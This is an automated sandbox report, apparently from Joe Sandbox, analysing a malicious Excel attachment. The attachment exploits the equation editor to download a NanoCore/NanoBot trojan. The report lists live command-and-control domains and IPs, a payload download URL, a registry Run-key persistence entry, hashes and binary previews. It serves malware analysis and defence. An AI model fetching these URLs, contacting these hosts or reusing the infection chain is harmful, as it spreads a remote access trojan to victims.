Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c5116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Source: C:\Users\Public\vbc.exe	Code function: 5_2_005C281A bind,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_005C27C8 bind,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Registry Run Keys / Startup Folder1	Extra Window Memory Injection1	Disable or Modify Tools1	Input Capture11	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Access Token Manipulation1	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Obfuscated Files or Information31	Security Account Manager	System Information Discovery17	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder1	Software Packing41	NTDS	Security Software Discovery121	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Extra Window Memory Injection1	LSA Secrets	Process Discovery2	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading111	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol122	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion21	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection112	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	35%	ReversingLabs	Win32.Trojan.NanoBot
C:\Users\user\AppData\Local\Temp\nsjBD87.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsjBD87.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsu1B8.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsu1B8.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	35%	ReversingLabs	Win32.Trojan.NanoBot
C:\Users\Public\vbc.exe	35%	ReversingLabs	Win32.Trojan.NanoBot

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.opjlpsercy.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
8.0.opjlpsercy.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
4.2.vbc.exe.40ff3e.1.unpack	100%	Avira	ADWARE/Patched.Ren.Gen7	Download File
7.1.opjlpsercy.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.opjlpsercy.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
7.0.opjlpsercy.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
6.2.opjlpsercy.exe.40ff3e.1.unpack	100%	Avira	ADWARE/Patched.Ren.Gen7	Download File
5.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
5.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
8.2.opjlpsercy.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
5.2.vbc.exe.44c0000.10.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.vbc.exe.9890000.9.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
5.2.vbc.exe.5620000.25.unpack	100%	Avira	TR/NanoCore.fadte	Download File
7.2.opjlpsercy.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.2.opjlpsercy.exe.4430000.10.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
5.1.vbc.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
wekeepworking.sytes.net	8%	Virustotal		Browse
wekeepworking12.sytes.net	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://198.12.127.155/new.exe	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
wekeepworking.sytes.net	0%	Avira URL Cloud	safe
wekeepworking12.sytes.net	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wekeepworking.sytes.net	79.134.225.90	true	true	8%, Virustotal, Browse	unknown
wekeepworking12.sytes.net	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.12.127.155/new.exe	true	Avira URL Cloud: malware	unknown
wekeepworking.sytes.net	true	Avira URL Cloud: safe	unknown
wekeepworking12.sytes.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	false		high
http://investor.msn.com	opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2159035727.0000000002290000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2358549037.0000000004C80000.00000002.00000001.sdmp, opjlpsercy.exe, 00000006.00000002.2195582210.0000000002260000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_Error	vbc.exe, vbc.exe, 00000004.00000000.2138873352.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.2151569123.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000006.00000000.2175454732.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000007.00000000.2189082624.0000000000409000.00000008.00020000.sdmp	false		high
http://investor.msn.com/	opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	vbc.exe, 00000004.00000002.2159035727.0000000002290000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2358549037.0000000004C80000.00000002.00000001.sdmp, opjlpsercy.exe, 00000006.00000002.2195582210.0000000002260000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000004.00000000.2138873352.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.2151569123.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000006.00000000.2175454732.0000000000409000.00000008.00020000.sdmp, opjlpsercy.exe, 00000007.00000000.2189082624.0000000000409000.00000008.00020000.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	opjlpsercy.exe, 00000006.00000002.2196235808.0000000002E27000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.134.225.90	wekeepworking.sytes.net	Switzerland		6775	FINK-TELECOM-SERVICESCH	true
198.12.127.155	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432576
Start date:	10.06.2021
Start time:	15:01:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Purchase Order Price List 061021.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@10/29@58/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 40.8% (good quality ratio 37.9%) Quality average: 78.7% Quality standard deviation: 30.3%
HCA Information:	Successful, ratio: 90% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:02:02	API Interceptor	65x Sleep call for process: EQNEDT32.EXE modified
15:02:13	API Interceptor	1507x Sleep call for process: vbc.exe modified
15:02:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ppeejliapu C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
15:02:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ppeejliapu C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
15:02:28	API Interceptor	1x Sleep call for process: opjlpsercy.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
79.134.225.90	ZVFVY7NwZ7.exe	Get hash	malicious	Browse
	kyIfnzzg3E.exe	Get hash	malicious	Browse
	Ref 0180066743.xlsx	Get hash	malicious	Browse
	AedJpyQ9lM.exe	Get hash	malicious	Browse
	Purchase Order Price List.xlsx	Get hash	malicious	Browse
	qdFDmi3Bhy.exe	Get hash	malicious	Browse
	A2PlnLyOA7.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse
	LOT_20210526.xlsx	Get hash	malicious	Browse
	Q2MAUt4mRO.exe	Get hash	malicious	Browse
	4fn66P5vkl.exe	Get hash	malicious	Browse
	P_O 00041221.xlsx	Get hash	malicious	Browse
	LOT_20210526.xlsx	Get hash	malicious	Browse
	Swift Copy.exe	Get hash	malicious	Browse
198.12.127.155	Ref 0180066743.xlsx	Get hash	malicious	Browse	198.12.127.155/new.exe
198.12.127.155	Purchase Order Price List.xlsx	Get hash	malicious	Browse	confucanism.hopto.org/new.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wekeepworking.sytes.net	ZVFVY7NwZ7.exe	Get hash	malicious	Browse	79.134.225.90
	kyIfnzzg3E.exe	Get hash	malicious	Browse	79.134.225.90
	Ref 0180066743.xlsx	Get hash	malicious	Browse	79.134.225.90
	AedJpyQ9lM.exe	Get hash	malicious	Browse	79.134.225.90
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	79.134.225.90
	qdFDmi3Bhy.exe	Get hash	malicious	Browse	79.134.225.90
	A2PlnLyOA7.exe	Get hash	malicious	Browse	79.134.225.90
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	Q2MAUt4mRO.exe	Get hash	malicious	Browse	79.134.225.90
	4fn66P5vkl.exe	Get hash	malicious	Browse	79.134.225.90
	P_O 00041221.xlsx	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	QI5MR3pte0.exe	Get hash	malicious	Browse	185.140.53.40
	5Em2NXNxSt.exe	Get hash	malicious	Browse	185.140.53.40
	7Zpsd899Kf.exe	Get hash	malicious	Browse	185.140.53.40
	LfgEatrwIF.exe	Get hash	malicious	Browse	185.140.53.40

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FINK-TELECOM-SERVICESCH	ZVFVY7NwZ7.exe	Get hash	malicious	Browse	79.134.225.90
	0jyrU2E05S.exe	Get hash	malicious	Browse	79.134.225.72
	kyIfnzzg3E.exe	Get hash	malicious	Browse	79.134.225.90
	Ref 0180066743.xlsx	Get hash	malicious	Browse	79.134.225.90
	MS2106071066.exe	Get hash	malicious	Browse	79.134.225.71
	Kangean PO.doc	Get hash	malicious	Browse	79.134.225.72
	facture.jar	Get hash	malicious	Browse	79.134.225.69
	c3yBu1IF57.exe	Get hash	malicious	Browse	79.134.225.92
	DPSGNwkO1Z.exe	Get hash	malicious	Browse	79.134.225.25
	SecuriteInfo.com.Trojan.Win32.Save.a.16917.exe	Get hash	malicious	Browse	79.134.225.94
	AedJpyQ9lM.exe	Get hash	malicious	Browse	79.134.225.90
	H538065217Invoice.exe	Get hash	malicious	Browse	79.134.225.9
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	79.134.225.90
	P.I-84512.doc	Get hash	malicious	Browse	79.134.225.41
	l00VLAF9y0xQ9Vr.exe	Get hash	malicious	Browse	79.134.225.92
	Swift [ref QT #U2013 2102001-R2]pdf.exe	Get hash	malicious	Browse	79.134.225.10
	PO756654.exe	Get hash	malicious	Browse	79.134.225.99
	qdFDmi3Bhy.exe	Get hash	malicious	Browse	79.134.225.90
	br.exe	Get hash	malicious	Browse	79.134.225.73
	Yeni sipari#U015f _WJO-001, pdf.exe	Get hash	malicious	Browse	79.134.225.71
AS-COLOCROSSINGUS	xYKsdzAUj8.exe	Get hash	malicious	Browse	192.210.198.12
	lsQ72VytAw.exe	Get hash	malicious	Browse	192.210.198.12
	EDxI6b8IKs.exe	Get hash	malicious	Browse	192.210.198.12
	ouGTVjHuUq.exe	Get hash	malicious	Browse	192.210.198.12
	vbc.xlsx	Get hash	malicious	Browse	107.173.219.35
	PO.xlsx	Get hash	malicious	Browse	198.12.110.183
	Duplicated Orders.xlsx	Get hash	malicious	Browse	198.12.110.183
	pago.xlsx	Get hash	malicious	Browse	192.227.228.121
	DEPOSITAR.xlsx	Get hash	malicious	Browse	198.12.110.183
	HT.xlsx	Get hash	malicious	Browse	198.12.110.183
	order 4806125050.xlsx	Get hash	malicious	Browse	192.227.228.121
	PO -TXGU5022187.xlsx	Get hash	malicious	Browse	192.227.228.121
	Ref 0180066743.xlsx	Get hash	malicious	Browse	198.12.127.155
	Naro#U010dite 5039066002128.xlsx	Get hash	malicious	Browse	192.227.228.121
	Proforma Inv.xlsx	Get hash	malicious	Browse	192.3.122.169
	Payment_Doc.xlsx	Get hash	malicious	Browse	107.173.219.35
	Purchase Order Price List.xlsx	Get hash	malicious	Browse	198.12.127.155
	BBS FX.xlsx	Get hash	malicious	Browse	198.12.110.183
	e#U03c2.xlsx	Get hash	malicious	Browse	192.227.228.121
	Zd1j3hnY8u.exe	Get hash	malicious	Browse	198.23.140.94

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsjBD87.tmp\System.dll	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse
	UGGJ4NnzFz.exe	Get hash	malicious	Browse
	Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Get hash	malicious	Browse
	3arZKnr21W.exe	Get hash	malicious	Browse
	Shipping receipt.exe	Get hash	malicious	Browse
	New Order TL273723734533.pdf.exe	Get hash	malicious	Browse
	YZ8OvkljWm.exe	Get hash	malicious	Browse
	U03c2doc.exe	Get hash	malicious	Browse
	QUOTE061021.exe	Get hash	malicious	Browse
	PAYMENT CONFIRMATION.exe	Get hash	malicious	Browse
	PO187439.exe	Get hash	malicious	Browse
	090009000000090.exe	Get hash	malicious	Browse
	NEWORDERLIST.exe	Get hash	malicious	Browse
	00404000004.exe	Get hash	malicious	Browse
	40900900090000.exe	Get hash	malicious	Browse
	INVO090090202.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe	Get hash	malicious	Browse
	D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe	Get hash	malicious	Browse
	D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.383129.23206.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	682684
Entropy (8bit):	7.985587248644902
Encrypted:	false
SSDEEP:	12288:y4Bwh6Ga/zhQmHMbNdSsTIDy5dX5Z6fdBUd+YiUjBumJBP4/MW:y4B/Ga/zhQ0MhTUCdX5Z6fd24YZjkmJy
MD5:	3DEB8B7E51C21CBA0C2C723C5AF953DD
SHA1:	F98809B1B883912D278F7EAF64D7EEDFAEE1EF5A
SHA-256:	C0503F7C65391A5BE8030BBAAF6C17260FA67E40A3FCC23B84C26610C266008B
SHA-512:	27B12686A9979FD2107806B3C923F5E616FEA6F9DBFA0DBC1516FEE88C330B3DD81C82794E20F085FDF324E1EA4EFF9B4A942E55FB19F13CE1DBE24074E76A94
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 35%
Reputation:	low
IE Cache URL:	http://198.12.127.155/new.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16BF6BD7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19EDB42.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\317D1105.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
